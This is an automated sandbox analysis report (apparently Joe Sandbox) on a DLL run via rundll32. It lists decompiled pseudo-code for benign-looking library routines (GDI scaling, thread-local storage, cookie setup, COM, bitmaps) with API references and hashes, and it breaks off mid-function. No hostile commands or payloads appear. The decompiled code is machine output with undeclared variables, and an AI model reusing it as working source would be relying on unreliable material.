Part of subcall function 10024CF2: MulDiv.KERNEL32(?,00000000,00000000), ref: 10024D32
Part of subcall function 10024CF2: MulDiv.KERNEL32(00000000,00000000,00000000), ref: 10024D4F

MulDiv.KERNEL32(?,000009EC,00000060), ref: 100267CA
MulDiv.KERNEL32(00000000,000009EC,742C8B90), ref: 100267D5

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 760de799c1e75d7bb557801077cbbfa8471c73a5d46f1b5f06ad39d09cfeeea3
Instruction ID: e9f0b5c96ca458b1cd62f243af22444899a9743c261e7e4df7add4579d722cac
Opcode Fuzzy Hash: 760de799c1e75d7bb557801077cbbfa8471c73a5d46f1b5f06ad39d09cfeeea3
Instruction Fuzzy Hash: D911E135600A14AFDB22AF69DC84C0EBBF9FF88754B224419FA819B361D771ED418F90

Uniqueness

Uniqueness Score: -1.00%

Function 100267E1 Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E100267E1(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x1003a0a8; // 0x60
					_t12 =  *0x1003a0ac; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t10 =  &(_t36[1]); // 0x4689ec45
						_t14 = MulDiv( *_t10, _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E10024C89(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,1000A5C8,?), ref: 100267F1
GetDeviceCaps.GDI32(?,00000058), ref: 1002682B
GetDeviceCaps.GDI32(?,0000005A), ref: 10026834

Part of subcall function 10024C89: MulDiv.KERNEL32(1000A5C8,00000000,00000000), ref: 10024CC9
Part of subcall function 10024C89: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 10024CE6

MulDiv.KERNEL32(1000A5C8,00000060,000009EC), ref: 10026858
MulDiv.KERNEL32(4689EC45,?,000009EC), ref: 10026863

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 11f4eb96b132fec85dcb3edfcd3011721d414923e9977079241e7a5a94dd0393
Instruction ID: 99770bef64d05f0654aa0606508a78cf0463e95a34ff476b879fb657cc8f91ae
Opcode Fuzzy Hash: 11f4eb96b132fec85dcb3edfcd3011721d414923e9977079241e7a5a94dd0393
Instruction Fuzzy Hash: 7C11E135A00A14AFDB229F55DC84C1EBBF9EF89750B210419FA8157360CB31ED41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 100142F3 Relevance: 7.5, APIs: 5, Instructions: 37
threadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 41%

			E100142F3(void* __edi) {
				void* __ebx;
				void* __esi;
				long _t5;
				long _t11;
				long _t12;
				long* _t17;

				_t5 = GetLastError();
				_t12 = _t5;
				_t17 =  *0x1003a1cc( *0x10037494);
				_t18 = _t17;
				if(_t17 == 0) {
					_push(0x8c);
					_push(1);
					_t17 = E10013955(_t12, __edi, _t17, _t18);
					if(_t17 == 0) {
						L4:
						E1001198E(0x10);
					} else {
						_push(_t17);
						_push( *0x10037494);
						if( *0x1003a1d0() == 0) {
							goto L4;
						} else {
							_t17[0x15] = 0x10037a08;
							_t17[5] = 1;
							_t11 = GetCurrentThreadId();
							_t17[1] = _t17[1] | 0xffffffff;
							 *_t17 = _t11;
						}
					}
				}
				SetLastError(_t12);
				return _t17;
			}

APIs

GetLastError.KERNEL32(?,00000000,10013373,10014CA0,00000000,1002EB78,00000008,10014CF7,?,?,?,100143E9,0000000D,1002E968,00000010,100144CB), ref: 100142F5
FlsGetValue.KERNEL32(?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?,1002E838), ref: 10014303
SetLastError.KERNEL32(00000000,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?), ref: 10014359

Part of subcall function 10013955: __lock.LIBCMT ref: 10013999
Part of subcall function 10013955: RtlAllocateHeap.NTDLL(00000008,?,1002E908,00000010,1001431B,00000001,0000008C,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000), ref: 100139D7

FlsSetValue.KERNEL32(00000000,?,100143E9,0000000D,1002E968,00000010,100144CB,?,1001189E,00000000,?,?,10011907,?,?,?), ref: 1001432A
GetCurrentThreadId.KERNEL32 ref: 10014342

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastValue$AllocateCurrentHeapThread__lock
String ID:
API String ID: 1487844433-0
Opcode ID: 151fadb9f5133ce9d09635453be35eb11438846519243a8763ef05a751eb20a2
Instruction ID: 6a455f0676b140873558791424d391acb8e9dcb403d95b32c906c56bd03f138a
Opcode Fuzzy Hash: 151fadb9f5133ce9d09635453be35eb11438846519243a8763ef05a751eb20a2
Instruction Fuzzy Hash: EAF0C232601B219FF3225F609C4960A7BA4FB017A2F120618EAA69E1A2CF71D9808790

Uniqueness

Uniqueness Score: -1.00%

Function 1001712C Relevance: 7.5, APIs: 5, Instructions: 32
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001712C() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t7;
				signed int _t9;
				signed int _t10;
				signed int _t11;
				signed int _t15;
				signed int _t22;

				_t7 =  *0x100371f4; // 0x82d1d2ba
				if(_t7 == 0 || _t7 == 0xbb40e64e) {
					GetSystemTimeAsFileTime( &_v12);
					_t9 = GetCurrentProcessId();
					_t10 = GetCurrentThreadId();
					_t11 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t15 = _v16 ^ _v20.LowPart;
					_t22 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t9 ^ _t10 ^ _t11 ^ _t15;
					 *0x100371f4 = _t22;
					if(_t22 == 0) {
						 *0x100371f4 = 0xbb40e64e;
					}
					return _t15;
				}
				return _t7;
			}

0x10017132
0x10017139
0x10017147
0x10017153
0x1001715b
0x10017163
0x1001716f
0x10017178
0x1001717b
0x1001717d
0x10017183
0x10017185
0x10017185
0x00000000
0x1001718f
0x10017191

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 10017147
GetCurrentProcessId.KERNEL32 ref: 10017153
GetCurrentThreadId.KERNEL32 ref: 1001715B
GetTickCount.KERNEL32 ref: 10017163
QueryPerformanceCounter.KERNEL32(?), ref: 1001716F

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 50d67e1d383f69dbcdee96c8bd050fcd69c67ab022712e76dea518af0d4ef41f
Instruction ID: 50d8a5486e903600f9401ca6b37cf5d4b62784a0750936f3c6adc6678c320fb2
Opcode Fuzzy Hash: 50d67e1d383f69dbcdee96c8bd050fcd69c67ab022712e76dea518af0d4ef41f
Instruction Fuzzy Hash: 2BF0F972D00239ABDB20EBB8DD8859EB7F8FF08394B920550E905EB110EA30E951CA80

Uniqueness

Uniqueness Score: -1.00%

Function 1000E51C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297
memoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E1000E51C(intOrPtr* __ecx) {
				intOrPtr _t130;
				intOrPtr* _t133;
				intOrPtr* _t140;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t146;
				intOrPtr* _t147;
				void* _t149;
				intOrPtr* _t153;
				signed int _t158;
				intOrPtr _t159;
				intOrPtr* _t161;
				intOrPtr* _t163;
				intOrPtr* _t165;
				intOrPtr* _t166;
				intOrPtr _t169;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				signed int _t180;
				signed int _t186;
				signed int _t188;
				intOrPtr* _t190;
				intOrPtr* _t192;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr* _t199;
				void* _t200;
				intOrPtr _t213;
				intOrPtr* _t215;
				intOrPtr* _t261;
				void* _t263;

				E10011A8C(E1002AC5F, _t263);
				_t130 =  *0x100371f4; // 0x82d1d2ba
				_t261 = __ecx;
				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t133 =  *((intOrPtr*)(__ecx + 8));
					if(_t133 != 0) {
						_push(_t263 - 0x7c);
						_push(_t263 - 0x78);
						_push(0x1002fb58);
						_push(_t133);
						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
							E1000B58F(_t263 - 0x70, 0x100301e4);
							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x58)) = 0;
							 *((intOrPtr*)(_t263 - 0x54)) = 0;
							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
							 *((intOrPtr*)(_t263 - 0x48)) = 0;
							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
							E1000B58F(_t263 - 0x40, 0x100301cc);
							_t140 =  *((intOrPtr*)(_t263 - 0x78));
							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
							 *((intOrPtr*)(_t263 - 0x24)) = 0;
							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
							 *((intOrPtr*)(_t263 - 0x18)) = 0;
							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
							if(_t196 >= 0) {
								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
								_t143 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
								 *(_t263 - 0x98) = 0;
								 *((intOrPtr*)(_t263 - 0x94)) = 0;
								 *((intOrPtr*)(_t263 - 0x90)) = 0;
								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
								if(_t144 >= 0) {
									 *(_t261 + 0x14) =  *(_t263 - 0x98);
									_t146 =  *(_t263 - 0x8c);
									 *(_t263 - 0x7c) = _t146;
									 *(_t261 + 0x10) = _t146;
									_t147 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
									 *((intOrPtr*)( *_t147 + 8))(_t147);
									goto L23;
								} else {
									_t161 =  *((intOrPtr*)(_t263 - 0x78));
									 *((intOrPtr*)( *_t161 + 8))(_t161);
								}
								goto L41;
							} else {
								_t163 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t163 + 8))(_t163);
								_t134 = _t196;
							}
						}
					} else {
						_t134 = 0;
					}
				} else {
					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x1002fcc8, _t263 - 0x74);
					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
					if(_t134 >= 0) {
						_t166 =  *((intOrPtr*)(_t263 - 0x74));
						_push(_t263 - 0x7c);
						_push(0x1002fca8);
						_push(_t166);
						if( *((intOrPtr*)( *_t166))() >= 0) {
							_t186 =  *(_t263 - 0x7c);
							_push(_t263 - 0x78);
							_push(0x1002fde8);
							 *((intOrPtr*)(_t263 - 0x78)) = 0;
							_push(_t186);
							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
								_t190 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
								_t192 =  *((intOrPtr*)(_t263 - 0x78));
								 *((intOrPtr*)( *_t192 + 8))(_t192);
							}
							_t188 =  *(_t263 - 0x7c);
							 *((intOrPtr*)( *_t188 + 8))(_t188);
						}
						if(E1001F51F(0x14) == 0) {
							_t169 = 0;
						} else {
							_t169 = E1000D436(_t168,  *((intOrPtr*)(_t263 - 0x74)));
						}
						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
						_t170 =  *((intOrPtr*)(_t263 - 0x74));
						 *((intOrPtr*)( *_t170 + 8))(_t170);
						_t172 =  *((intOrPtr*)(_t261 + 0x50));
						_t229 =  *_t172;
						if( *_t172 != 0) {
							E1000B80D(_t229, _t172 + 4);
						}
						if(E1001F51F(0x28) == 0) {
							_t174 = 0;
						} else {
							_t174 = E1000A256(_t173, 0, 0x1f40);
						}
						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
						E1000DF4C(_t174);
						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
						 *(_t261 + 0x10) = _t178;
						_t180 = _t178 + _t178 * 4 << 3;
						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
						 *(_t261 + 0x14) = _t180;
						E10012400(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
						E1000DE36( *((intOrPtr*)(_t261 + 0x50)));
						E1000B7CA( *((intOrPtr*)(_t261 + 0x50)));
						L23:
						 *((intOrPtr*)(_t263 - 0x74)) = 0;
						if( *(_t261 + 0x10) > 0) {
							_t200 = 0;
							do {
								_t158 = E1001F51F(0x1c);
								 *(_t263 - 0x7c) = _t158;
								 *(_t263 - 4) = 0;
								if(_t158 == 0) {
									_t159 = 0;
								} else {
									_t159 = E1001D93B(_t158, 0xa);
								}
								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
								_t200 = _t200 + 0x28;
							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
						}
						_t198 =  *((intOrPtr*)(_t263 - 0x88));
						if(_t198 != 0) {
							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
								_t149 = 0xffffffdc;
								_t199 = _t198 + 0x24;
								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
								while(1) {
									_t213 =  *((intOrPtr*)( *_t199 + 4));
									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
									if(_t213 == 0) {
										goto L37;
									}
									while(1) {
										_t153 = E10007404(_t263 - 0x80);
										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
											goto L37;
										}
									}
									L37:
									E1001D876( *_t199);
									_t215 =  *_t199;
									if(_t215 != 0) {
										 *((intOrPtr*)( *_t215 + 4))(1);
									}
									_t199 = _t199 + 0x28;
									_t122 = _t263 - 0x74;
									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
									if( *_t122 != 0) {
										continue;
									}
									goto L40;
								}
							}
							L40:
							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
						}
						L41:
						_t134 =  *((intOrPtr*)(_t263 - 0x84));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
				return E10011A49(_t134,  *((intOrPtr*)(_t263 - 0x10)));
			}

APIs

__EH_prolog.LIBCMT ref: 1000E521
CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E648
CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E860

Strings

, xrefs: 1000E6F8

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Task$AllocFreeH_prolog
String ID:
API String ID: 1522537378-3916222277
Opcode ID: 7984054ffb1da2621cab150e098b40a3d144c49dc56001520108efcfd34a23e8
Instruction ID: 6f949c1b0ac458bb1f1f724c38c51bef9759c86c0bbd1da9e935ed9f44a5127e
Opcode Fuzzy Hash: 7984054ffb1da2621cab150e098b40a3d144c49dc56001520108efcfd34a23e8
Instruction Fuzzy Hash: 0AC11874A006489FEB24CFA8C884AADB7F5FF88344F20855DE54AEB256DB71AD45CF10

Uniqueness

Uniqueness Score: -1.00%

Function 1000BAC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E1000BAC2(void* __ecx) {
				intOrPtr* _t76;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t107;
				intOrPtr* _t143;
				void* _t146;
				void* _t148;

				E10011A8C(E1002ABC8, _t148);
				_t146 = __ecx;
				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
				_push(_t148 - 0x14);
				_push(0x1002fbc8);
				 *((intOrPtr*)(_t148 - 0x14)) = 0;
				_push(_t76);
				 *((intOrPtr*)(_t148 - 0x18)) = 0;
				if( *((intOrPtr*)( *_t76))() >= 0) {
					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
					 *((intOrPtr*)(_t148 - 0x78)) = 0;
					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
					 *((intOrPtr*)(_t148 - 0x50)) = 0;
					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
					E1001064A(_t148 - 0x28);
					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
					 *((intOrPtr*)(_t148 - 4)) = 0;
					 *(_t148 - 0x6c) = 0;
					 *((intOrPtr*)(_t148 - 0x10)) = 0;
					do {
						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x1002d938)), _t148 - 0x28);
						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x1002d93c);
						}
						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
					_t101 =  *((intOrPtr*)(_t148 - 0x20));
					_push(_t148 - 0x60);
					_push(0x1002fc18);
					_push(_t101);
					if( *((intOrPtr*)( *_t101))() < 0) {
						 *((intOrPtr*)(_t148 - 0x60)) = 0;
					}
					_t103 =  *((intOrPtr*)(_t148 - 0x14));
					_push(_t148 - 0x40);
					_push(_t148 - 0x80);
					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
					_push(_t103);
					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
						 *((intOrPtr*)(_t148 - 0x18)) = 1;
					}
					_t105 =  *((intOrPtr*)(_t148 - 0x14));
					 *((intOrPtr*)( *_t105 + 8))(_t105);
					_t107 =  *((intOrPtr*)(_t148 - 0x60));
					if(_t107 != 0) {
						 *((intOrPtr*)( *_t107 + 8))(_t107);
					}
					__imp__#9(_t148 - 0x28);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
				return  *((intOrPtr*)(_t148 - 0x18));
			}

APIs

__EH_prolog.LIBCMT ref: 1000BAC7
VariantClear.OLEAUT32(?), ref: 1000BC54

Strings

@, xrefs: 1000BB14
@, xrefs: 1000BB69

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ClearH_prologVariant
String ID: @$@
API String ID: 1166855276-149943524
Opcode ID: 6aaaa31fd4c3ac7e832f08c54c50d4dd872d17614035c5eb8da97c9537ba3532
Instruction ID: 8413621b418a9e557432ec25b9ac0905e245df0d8dbf75b72d1ba3b7849b3774
Opcode Fuzzy Hash: 6aaaa31fd4c3ac7e832f08c54c50d4dd872d17614035c5eb8da97c9537ba3532
Instruction Fuzzy Hash: DA51D5B1A002199FDB04CFA8C8849EEBBF9FF48304F14456EE506EB250E774A945CF60

Uniqueness

Uniqueness Score: -1.00%

Function 10027331 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E10027331(void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t24;
				unsigned int _t25;
				int _t31;
				signed int _t38;
				struct HBITMAP__* _t40;
				int _t43;
				int _t45;
				void* _t48;
				signed int* _t52;
				signed int _t57;
				signed int _t61;
				void* _t62;
				void* _t64;
				void* _t66;

				_t48 = __edx;
				_t64 = _t66 - 0x78;
				_t24 =  *0x100371f4; // 0x82d1d2ba
				 *((intOrPtr*)(_t64 + 0x74)) = _t24;
				_t25 = GetMenuCheckMarkDimensions();
				_t43 = _t25;
				_t45 = _t25 >> 0x10;
				 *(_t64 - 0x18) = _t45;
				if(_t43 > 0x20) {
					_t43 = 0x20;
				}
				_t4 = _t43 - 4; // 0x1c
				asm("cdq");
				_t5 = _t43 + 0xf; // 0x2f
				_t61 = _t5 >> 4;
				_t57 = (_t4 - _t48 >> 1) + (_t61 << 4) - _t43;
				if(_t57 > 0xc) {
					_t57 = 0xc;
				}
				_t31 = 0x20;
				if(_t45 > _t31) {
					 *(_t64 - 0x18) = _t31;
				}
				E10012400(_t64 - 0xc, 0xff, 0x80);
				_t52 = _t64 + ( *(_t64 - 0x18) - 6 >> 1) * _t61 * 2 - 0xc;
				 *(_t64 - 0x10) = 0x1002be78;
				_t62 = _t61 + _t61;
				 *((intOrPtr*)(_t64 - 0x14)) = 5;
				do {
					 *(_t64 - 0x10) =  &(( *(_t64 - 0x10))[1]);
					_t38 =  !(( *( *(_t64 - 0x10)) & 0x000000ff) << _t57);
					 *_t52 = _t38;
					_t52[0] = _t38;
					_t52 = _t52 + _t62;
					_t19 = _t64 - 0x14;
					 *_t19 =  *((intOrPtr*)(_t64 - 0x14)) - 1;
				} while ( *_t19 != 0);
				_t40 = CreateBitmap(_t43,  *(_t64 - 0x18), 1, 1, _t64 - 0xc);
				 *0x1003a0e0 = _t40;
				if(_t40 == 0) {
					 *0x1003a0e0 = _t40;
				}
				return E10011A49(_t40,  *((intOrPtr*)(_t64 + 0x74)));
			}

APIs

GetMenuCheckMarkDimensions.USER32 ref: 10027347
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100273E9
LoadBitmapA.USER32 ref: 10027401

Strings

, xrefs: 10027353

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: 61b8a6ea2f17090497b63910f8532d18b4b53824e18819d7300cbcfb591eeebb
Instruction ID: deb4626aaa7cae345da9a6d3d66d22e9dbe08d2c12093e9aa6a7ce030dca17ca
Opcode Fuzzy Hash: 61b8a6ea2f17090497b63910f8532d18b4b53824e18819d7300cbcfb591eeebb
Instruction Fuzzy Hash: CE212772E002169FEB10CFA8DCC5AAEBBB9FB44300F144526E905EB291D7709A45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10026C40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E10026C40(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v276;
				intOrPtr _t10;
				long _t12;
				void* _t13;
				CHAR* _t16;
				void* _t30;
				void* _t33;

				_t10 =  *0x100371f4; // 0x82d1d2ba
				_v8 = _t10;
